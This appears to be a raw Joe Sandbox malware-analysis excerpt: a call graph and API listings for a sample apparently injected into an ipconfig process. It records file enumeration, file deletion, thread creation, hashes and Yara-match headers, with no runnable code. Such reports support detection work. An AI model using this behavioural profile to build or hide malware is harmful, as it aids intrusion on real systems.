27960->27962 28089 75d5f0 11 API calls 27960->28089 27963 75e09e 27962->27963 28090 76aec0 10 API calls 27962->28090 27963->27867 27968 7673b0 9 API calls 27968->27960 27970 75e3bd 27969->27970 27976 76c3e0 27970->27976 27972 75e405 27972->27900 27977 76d3f0 LdrLoadDll 27976->27977 27978 76c3fc 27977->27978 27986 33099a0 LdrInitializeThunk 27978->27986 27979 75e3fe 27979->27972 27981 76c430 27979->27981 27982 76d3f0 LdrLoadDll 27981->27982 27983 76c44c 27982->27983 27987 3309780 LdrInitializeThunk 27983->27987 27984 75e42e 27984->27900 27986->27979 27987->27984 28020 75d670 27988->28020 27990 75dde2 27991 76e400 LdrLoadDll 27990->27991 27992 75ddf1 27991->27992 27992->27902 27993 75dcde 27993->27990 28029 76b610 27993->28029 27996 759bfb 27995->27996 27997 75e1e0 3 API calls 27996->27997 28003 759d1b 27996->28003 27998 759cfc 27997->27998 27999 759d2a 27998->27999 28000 759d11 27998->28000 28001 76c8b0 2 API calls 27998->28001 27999->27906 28040 756cb0 LdrLoadDll 28000->28040 28001->28000 28003->27906 28005 76d3f0 LdrLoadDll 28004->28005 28006 75c6a0 28005->28006 28006->27907 28006->27914 28006->27915 28008 75e570 2 API calls 28007->28008 28009 76b7c2 28008->28009 28009->27932 28010->27938 28011->27918 28012->27925 28013->27931 28014->27935 28015->27939 28016->27944 28017->27940 28018->27943 28019->27907 28021 75d6a3 28020->28021 28035 75b7b0 28021->28035 28023 75d6b5 28024 75e3a0 3 API calls 28023->28024 28025 75d6f8 28024->28025 28026 75d6ff 28025->28026 28039 76e440 LdrLoadDll 28025->28039 28026->27993 28028 75d70f 28028->27993 28030 76b61f 28029->28030 28031 7677c0 LdrLoadDll 28030->28031 28032 76b637 28031->28032 28033 76b65d 28032->28033 28034 76b64a CreateThread 28032->28034 28033->27990 28034->27990 28036 75b7d7 28035->28036 28037 75b4c0 LdrLoadDll 28036->28037 28038 75b813 28037->28038 28038->28023 28039->28028 28040->28003 28042 76d3f0 LdrLoadDll 28041->28042 28043 76c2cc 28042->28043 28046 3309840 LdrInitializeThunk 28043->28046 28044 75e5ae 28044->27867 
28046->28044 28048 75de30 28047->28048 28091 7666d0 28048->28091 28050 75de81 28120 765580 28050->28120 28052 75de87 28154 7623a0 28052->28154 28054 75de8d 28185 764600 28054->28185 28060 75dea1 28229 765df0 28060->28229 28062 75dea7 28253 75fce0 28062->28253 28064 75debf 28268 760f80 28064->28268 28068 75dc58 28067->28068 28072 75dcaf 28067->28072 28069 7611c0 9 API calls 28068->28069 28068->28072 28070 75dc99 28069->28070 28070->28072 28537 761410 11 API calls 28070->28537 28072->27963 28073 75da80 28072->28073 28074 75da9c 28073->28074 28088 75db7b 28073->28088 28076 76c8b0 2 API calls 28074->28076 28074->28088 28075 75dc0b 28077 75dc25 28075->28077 28079 7673b0 9 API calls 28075->28079 28078 75dab7 28076->28078 28077->27960 28077->27968 28538 75cf70 LdrLoadDll NtClose LdrInitializeThunk 28078->28538 28079->28077 28081 75dbe8 28081->28075 28540 75d140 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 28081->28540 28083 75daef 28085 75b4c0 LdrLoadDll 28083->28085 28086 75db00 28085->28086 28087 75b4c0 LdrLoadDll 28086->28087 28087->28088 28088->28075 28539 75cf70 LdrLoadDll NtClose LdrInitializeThunk 28088->28539 28089->27962 28090->27963 28092 7666f8 28091->28092 28093 75b4c0 LdrLoadDll 28092->28093 28094 76670c 28093->28094 28095 75cd30 3 API calls 28094->28095 28097 76673f 28095->28097 28096 766746 28096->28050 28097->28096 28098 75b4c0 LdrLoadDll 28097->28098 28099 76676e 28098->28099 28100 75b4c0 LdrLoadDll 28099->28100 28101 766792 28100->28101 28273 75cdf0 28101->28273 28103 7667f8 28105 75b4c0 LdrLoadDll 28103->28105 28104 7667b6 28104->28103 28117 76697b 28104->28117 28277 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28104->28277 28106 766818 28105->28106 28108 75cdf0 2 API calls 28106->28108 28111 76683c 28108->28111 28109 766882 28110 75cdf0 2 API calls 28109->28110 28114 7668b2 28110->28114 28111->28109 28111->28117 28278 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28111->28278 28113 7668f8 28116 75cdf0 2 API calls 
28113->28116 28114->28113 28114->28117 28279 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28114->28279 28119 766957 28116->28119 28117->28050 28119->28117 28280 766420 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 28119->28280 28121 7655e4 28120->28121 28122 75b4c0 LdrLoadDll 28121->28122 28123 7656b1 28122->28123 28124 75cd30 3 API calls 28123->28124 28126 7656e4 28124->28126 28125 7656eb 28125->28052 28126->28125 28127 75b4c0 LdrLoadDll 28126->28127 28128 765713 28127->28128 28129 75cdf0 2 API calls 28128->28129 28130 765753 28129->28130 28131 765882 28130->28131 28152 765873 28130->28152 28287 765370 28130->28287 28132 76c8b0 2 API calls 28131->28132 28134 76588c 28132->28134 28134->28052 28135 765788 28135->28131 28136 765793 28135->28136 28137 76e400 LdrLoadDll 28136->28137 28138 7657bc 28137->28138 28139 7657c5 28138->28139 28140 7657db 28138->28140 28141 76c8b0 2 API calls 28139->28141 28316 765260 CoInitialize 28140->28316 28143 7657cf 28141->28143 28143->28052 28144 7657e9 28318 76c5c0 28144->28318 28146 765862 28147 76c8b0 2 API calls 28146->28147 28149 76586c 28147->28149 28151 76e320 2 API calls 28149->28151 28150 765807 28150->28146 28153 76c5c0 LdrLoadDll 28150->28153 28321 765190 LdrLoadDll RtlFreeHeap 28150->28321 28151->28152 28152->28052 28153->28150 28155 7623c8 28154->28155 28156 76e400 LdrLoadDll 28155->28156 28158 762428 28156->28158 28157 762431 28157->28054 28158->28157 28322 761800 28158->28322 28160 76245a 28161 76247a 28160->28161 28352 761b10 LdrLoadDll 28160->28352 28162 762498 28161->28162 28354 764100 10 API calls 28161->28354 28170 7624b2 28162->28170 28356 75b2c0 LdrLoadDll 28162->28356 28165 762468 28165->28161 28353 762120 9 API calls 28165->28353 28166 76248c 28355 764100 10 API calls 28166->28355 28171 761800 10 API calls 28170->28171 28172 7624df 28171->28172 28183 762500 28172->28183 28357 761b10 LdrLoadDll 28172->28357 28174 762538 28178 76e320 2 API calls 28174->28178 28175 7624ee 28175->28183 28358 762120 9 
API calls 28175->28358 28180 762542 28178->28180 28179 762512 28360 764100 10 API calls 28179->28360 28180->28054 28184 76251e 28183->28184 28359 764100 10 API calls 28183->28359 28184->28174 28361 75b2c0 LdrLoadDll 28184->28361 28186 764626 28185->28186 28187 75b4c0 LdrLoadDll 28186->28187 28188 764655 28187->28188 28189 75b4c0 LdrLoadDll 28188->28189 28190 764681 28188->28190 28189->28190 28377 75e7d0 28190->28377 28192 764765 28193 75de95 28192->28193 28382 764310 28192->28382 28195 7658a0 28193->28195 28196 764600 10 API calls 28195->28196 28197 75de9b 28196->28197 28198 763320 28197->28198 28199 763342 28198->28199 28200 75b4c0 LdrLoadDll 28199->28200 28201 76350d 28200->28201 28202 75b4c0 LdrLoadDll 28201->28202 28203 76351e 28202->28203 28204 75b390 LdrLoadDll 28203->28204 28205 763535 28204->28205 28462 7631e0 28205->28462 28208 7631e0 12 API calls 28209 7635a8 28208->28209 28210 7631e0 12 API calls 28209->28210 28211 7635c0 28210->28211 28212 7631e0 12 API calls 28211->28212 28213 7635d8 28212->28213 28214 7631e0 12 API calls 28213->28214 28215 7635f0 28214->28215 28216 7631e0 12 API calls 28215->28216 28218 76360b 28216->28218 28217 763625 28217->28060 28218->28217 28219 7631e0 12 API calls 28218->28219 28220 763659 28219->28220 28221 7631e0 12 API calls 28220->28221 28222 763696 28221->28222 28223 7631e0 12 API calls 28222->28223 28224 7636d3 28223->28224 28225 7631e0 12 API calls 28224->28225 28226 763710 28225->28226 28227 7631e0 12 API calls 28226->28227 28228 76374d 28227->28228 28228->28060 28230 765e0d 28229->28230 28231 75b170 LdrLoadDll 28230->28231 28232 765e28 28231->28232 28233 7677c0 LdrLoadDll 28232->28233 28250 76602c 28232->28250 28234 765e58 28233->28234 28235 7677c0 LdrLoadDll 28234->28235 28236 765e71 28235->28236 28237 7677c0 LdrLoadDll 28236->28237 28238 765e8a 28237->28238 28239 7677c0 LdrLoadDll 28238->28239 28240 765ea6 28239->28240 28241 7677c0 LdrLoadDll 28240->28241 28242 765ebf 28241->28242 28243 7677c0 LdrLoadDll 28242->28243 
28244 765ed8 28243->28244 28245 7677c0 LdrLoadDll 28244->28245 28246 765ef4 28245->28246 28247 7677c0 LdrLoadDll 28246->28247 28248 765f0d 28247->28248 28249 7677c0 LdrLoadDll 28248->28249 28251 765f25 28249->28251 28250->28062 28251->28250 28477 7659e0 LdrLoadDll 28251->28477 28254 75fcf6 28253->28254 28264 75fd01 28253->28264 28255 76e400 LdrLoadDll 28254->28255 28255->28264 28256 75fd17 28256->28064 28257 7677c0 LdrLoadDll 28257->28264 28258 75fdfc GetFileAttributesW 28258->28264 28259 75ff7f 28260 75ff98 28259->28260 28261 76e320 2 API calls 28259->28261 28260->28064 28261->28260 28263 75b4c0 LdrLoadDll 28263->28264 28264->28256 28264->28257 28264->28258 28264->28259 28264->28263 28265 763760 9 API calls 28264->28265 28478 76aab0 28264->28478 28482 76a940 9 API calls 28264->28482 28483 76a7e0 9 API calls 28264->28483 28265->28264 28484 760d00 28268->28484 28270 760f8d 28505 7609e0 28270->28505 28272 75ded1 28272->27957 28274 75ce15 28273->28274 28281 76c4b0 28274->28281 28277->28103 28278->28109 28279->28113 28280->28117 28282 76d3f0 LdrLoadDll 28281->28282 28283 76c4cc 28282->28283 28286 33096d0 LdrInitializeThunk 28283->28286 28284 75ce89 28284->28104 28286->28284 28288 76538c 28287->28288 28289 75b170 LdrLoadDll 28288->28289 28291 7653a7 28289->28291 28290 7653b0 28290->28135 28291->28290 28292 7677c0 LdrLoadDll 28291->28292 28293 7653cd 28292->28293 28294 7677c0 LdrLoadDll 28293->28294 28295 7653e8 28294->28295 28296 7677c0 LdrLoadDll 28295->28296 28297 765401 28296->28297 28298 7677c0 LdrLoadDll 28297->28298 28299 76541d 28298->28299 28300 7677c0 LdrLoadDll 28299->28300 28301 765436 28300->28301 28302 7677c0 LdrLoadDll 28301->28302 28303 76544f 28302->28303 28304 75b170 LdrLoadDll 28303->28304 28306 76547b 28304->28306 28305 765529 28305->28135 28306->28305 28307 7677c0 LdrLoadDll 28306->28307 28308 76549f 28307->28308 28309 75b170 LdrLoadDll 28308->28309 28310 7654d4 28309->28310 28310->28305 28311 7677c0 LdrLoadDll 28310->28311 28312 7654f7 28311->28312 
28313 7677c0 LdrLoadDll 28312->28313 28314 765510 28313->28314 28315 7677c0 LdrLoadDll 28314->28315 28315->28305 28317 7652c5 28316->28317 28317->28144 28319 76d3f0 LdrLoadDll 28318->28319 28320 76c5dc 28319->28320 28320->28150 28321->28150 28323 761898 28322->28323 28324 75b4c0 LdrLoadDll 28323->28324 28325 761936 28324->28325 28326 75b4c0 LdrLoadDll 28325->28326 28327 761951 28326->28327 28328 75cdf0 2 API calls 28327->28328 28329 761976 28328->28329 28330 761abd 28329->28330 28374 76c540 LdrLoadDll 28329->28374 28331 761ace 28330->28331 28362 7611c0 28330->28362 28331->28160 28334 7619a4 28335 761ab3 28334->28335 28337 7619af 28334->28337 28336 76c8b0 2 API calls 28335->28336 28336->28330 28338 76c8b0 2 API calls 28337->28338 28339 7619e9 28338->28339 28375 76e4e0 LdrLoadDll 28339->28375 28341 761a1f 28341->28331 28342 75cdf0 2 API calls 28341->28342 28343 761a45 28342->28343 28343->28331 28376 76c540 LdrLoadDll 28343->28376 28345 761a6a 28346 761a71 28345->28346 28347 761a9d 28345->28347 28349 76c8b0 2 API calls 28346->28349 28348 76c8b0 2 API calls 28347->28348 28350 761aa7 28348->28350 28351 761a7b 28349->28351 28350->28160 28351->28160 28352->28165 28353->28161 28354->28166 28355->28162 28356->28170 28357->28175 28358->28183 28359->28179 28360->28184 28361->28174 28363 7611e5 28362->28363 28364 75b4c0 LdrLoadDll 28363->28364 28365 7612a0 28364->28365 28366 75b4c0 LdrLoadDll 28365->28366 28367 7612c4 28366->28367 28368 7673b0 9 API calls 28367->28368 28370 761317 28368->28370 28369 7613d1 28369->28331 28370->28369 28371 75b4c0 LdrLoadDll 28370->28371 28372 76137e 28371->28372 28373 7673b0 9 API calls 28372->28373 28373->28369 28374->28334 28375->28341 28376->28345 28378 7677c0 LdrLoadDll 28377->28378 28379 75e7ef 28378->28379 28380 75e7f6 GetFileAttributesW 28379->28380 28381 75e801 28379->28381 28380->28381 28381->28192 28406 76ac10 28382->28406 28384 76437b 28384->28192 28385 764326 28385->28384 28386 764387 28385->28386 28387 764345 28385->28387 28388 
75b4c0 LdrLoadDll 28386->28388 28389 76434d 28387->28389 28390 76436a 28387->28390 28393 764398 28388->28393 28391 76e320 2 API calls 28389->28391 28392 76e320 2 API calls 28390->28392 28394 76435e 28391->28394 28392->28384 28395 7673b0 9 API calls 28393->28395 28394->28192 28396 7643af 28395->28396 28446 763760 28396->28446 28398 7643ba 28402 7644b8 28398->28402 28403 7643d2 28398->28403 28399 76449f 28400 76e320 2 API calls 28399->28400 28401 7645c3 28400->28401 28401->28192 28402->28399 28457 763cf0 9 API calls 28402->28457 28403->28399 28456 763cf0 9 API calls 28403->28456 28407 76ac1e 28406->28407 28408 76ac25 28406->28408 28407->28385 28409 75b170 LdrLoadDll 28408->28409 28410 76ac57 28409->28410 28411 76ac66 28410->28411 28458 76a700 LdrLoadDll 28410->28458 28413 76e400 LdrLoadDll 28411->28413 28432 76ae49 28411->28432 28414 76ac7f 28413->28414 28415 76ac94 28414->28415 28416 76adf8 28414->28416 28414->28432 28459 763840 LdrLoadDll 28415->28459 28417 76ae02 28416->28417 28418 76ae9b 28416->28418 28460 763840 LdrLoadDll 28417->28460 28421 76e320 2 API calls 28418->28421 28421->28432 28422 76acab 28425 7677c0 LdrLoadDll 28422->28425 28423 76ae19 28461 76a030 LdrLoadDll 28423->28461 28427 76acc7 28425->28427 28426 76ae2f 28428 7677c0 LdrLoadDll 28426->28428 28429 7677c0 LdrLoadDll 28427->28429 28428->28432 28430 76ace3 28429->28430 28431 7677c0 LdrLoadDll 28430->28431 28433 76ad02 28431->28433 28432->28385 28434 7677c0 LdrLoadDll 28433->28434 28435 76ad1e 28434->28435 28436 7677c0 LdrLoadDll 28435->28436 28437 76ad3a 28436->28437 28438 7677c0 LdrLoadDll 28437->28438 28439 76ad59 28438->28439 28440 7677c0 LdrLoadDll 28439->28440 28441 76ad75 28440->28441 28442 7677c0 LdrLoadDll 28441->28442 28443 76ad98 28442->28443 28443->28432 28444 76e320 2 API calls 28443->28444 28445 76adec 28444->28445 28445->28385 28447 7673b0 9 API calls 28446->28447 28448 763776 28447->28448 28449 763783 28448->28449 28450 7673b0 9 API calls 28448->28450 28449->28398 28451 763794 
28450->28451 28451->28449 28452 7673b0 9 API calls 28451->28452 28453 7637af 28452->28453 28454 76e320 2 API calls 28453->28454 28455 7637bc 28454->28455 28455->28398 28456->28403 28457->28402 28458->28411 28459->28422 28460->28423 28461->28426 28463 763209 28462->28463 28464 7677c0 LdrLoadDll 28463->28464 28465 763246 28464->28465 28466 7677c0 LdrLoadDll 28465->28466 28467 763264 28466->28467 28468 7677c0 LdrLoadDll 28467->28468 28470 763286 28468->28470 28469 76330c 28469->28208 28470->28469 28471 7632b0 FindFirstFileW 28470->28471 28471->28469 28475 7632cb 28471->28475 28472 7632f3 FindNextFileW 28474 763305 FindClose 28472->28474 28472->28475 28474->28469 28475->28472 28476 7630c0 12 API calls 28475->28476 28476->28475 28477->28251 28479 76aac6 28478->28479 28481 76abc6 28478->28481 28480 7673b0 9 API calls 28479->28480 28479->28481 28480->28479 28481->28264 28482->28264 28483->28264 28485 760d25 28484->28485 28486 75b4c0 LdrLoadDll 28485->28486 28487 760d8a 28486->28487 28488 75b4c0 LdrLoadDll 28487->28488 28489 760dd8 28488->28489 28490 75e7d0 2 API calls 28489->28490 28491 760e1f 28490->28491 28492 760e26 28491->28492 28493 76ac10 2 API calls 28491->28493 28492->28270 28495 760e34 28493->28495 28494 760e3d 28494->28270 28495->28494 28496 75b4c0 LdrLoadDll 28495->28496 28498 760e8c 28496->28498 28497 76aab0 9 API calls 28497->28498 28498->28497 28500 760f11 28498->28500 28518 760440 28498->28518 28501 760f69 28500->28501 28529 7607a0 28500->28529 28503 76e320 2 API calls 28501->28503 28504 760f70 28503->28504 28504->28270 28506 7609f6 28505->28506 28516 760a01 28505->28516 28507 76e400 LdrLoadDll 28506->28507 28507->28516 28508 760a17 28508->28272 28509 75e7d0 2 API calls 28509->28516 28510 760cd0 28511 760ce9 28510->28511 28512 76e320 2 API calls 28510->28512 28511->28272 28512->28511 28513 76aab0 9 API calls 28513->28516 28514 760440 9 API calls 28514->28516 28515 75b4c0 LdrLoadDll 28515->28516 28516->28508 28516->28509 28516->28510 28516->28513 
28516->28514 28516->28515 28517 7607a0 9 API calls 28516->28517 28517->28516 28519 760466 28518->28519 28520 7673b0 9 API calls 28519->28520 28521 7604c2 28520->28521 28522 763760 9 API calls 28521->28522 28523 7604cd 28522->28523 28525 760650 28523->28525 28527 7604eb 28523->28527 28524 760635 28524->28498 28525->28524 28536 760310 9 API calls 28525->28536 28527->28524 28535 760310 9 API calls 28527->28535 28530 7607c6 28529->28530 28531 7673b0 9 API calls 28530->28531 28532 760837 28531->28532 28533 763760 9 API calls 28532->28533 28534 760842 28533->28534 28534->28500 28535->28527 28536->28525 28537->28072 28538->28083 28539->28081 28540->28075 28541 75ebdf 28542 75ebe9 28541->28542 28543 7673b0 9 API calls 28542->28543 28544 75ebcf 28543->28544
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 007632C1
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 007632FE
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(?), ref: 00763309
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtDeleteFile.NTDLL(tv,00000002,?,007674E2,00000000,00000018,?,?,7BE2EBFA,00000000,?), ref: 0076C8A5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                                            • String ID: tv
                                                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-369425511
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtClose.NTDLL(Uu,00000000,?,0075E555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0076C8D5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                                                                            • String ID: Uu
                                                                                                                                                                                                                                                                                                                            • API String ID: 3535843008-130747043
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtDeleteFile.NTDLL(tv,00000002,?,007674E2,00000000,00000018,?,?,7BE2EBFA,00000000,?), ref: 0076C8A5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                                                                                            • String ID: tv
                                                                                                                                                                                                                                                                                                                            • API String ID: 4033686569-369425511
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,?,0076751C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0076751C,?,00000000,00000060,00000000,00000000), ref: 0076C7CD
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,007671CA,00000002,?,?,00000002,007671CA,FFFFFFFF,vv,vv,00000002,00000000), ref: 0076C875
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_750000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 633a8623e59fc3909db9d07ee6c6cb84c23288b149f8502d003803c9fb95ba78
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F0AFB2210208ABCB14DF99DC85EEB77ADEF8C754F158248BE0DA7241D630E8118BA1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ae87f927314535a1e253e4bf80912ecaf50d82804be7f4a1150a5d28f95ccafe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b8322761086d375c9182b6da9002b5209d2a1d6db8329ce14ccaf5f6ba4b962e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae87f927314535a1e253e4bf80912ecaf50d82804be7f4a1150a5d28f95ccafe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3090027521105802D104A5995448656040597E1341F51D421A5014555EC7A588B17171
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c57654b72eb07dddff1151fb2b6f10f87d7efd8909db0a4f950235eb5aef27b7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: e5c2128f2fb593074b3372562ab30971ae7df37352a4698b29df6266b2a0e1e0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c57654b72eb07dddff1151fb2b6f10f87d7efd8909db0a4f950235eb5aef27b7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F90026D22305402D184B159544861A040597D2342F91D825A0005558CCA5588796361
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000006.00000002.828813075.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000006.00000002.828813075.00000000033BF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_32a0000_ipconfig.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 56f6fa30e7e091137d408d04237c501e6ce58e335c3ffb442730da49d7937952
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 83767ceb6eadd298c17fa5e71ed45c6ba7be86119a8d5e8e26e07c6c1e0ad690
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56f6fa30e7e091137d408d04237c501e6ce58e335c3ffb442730da49d7937952
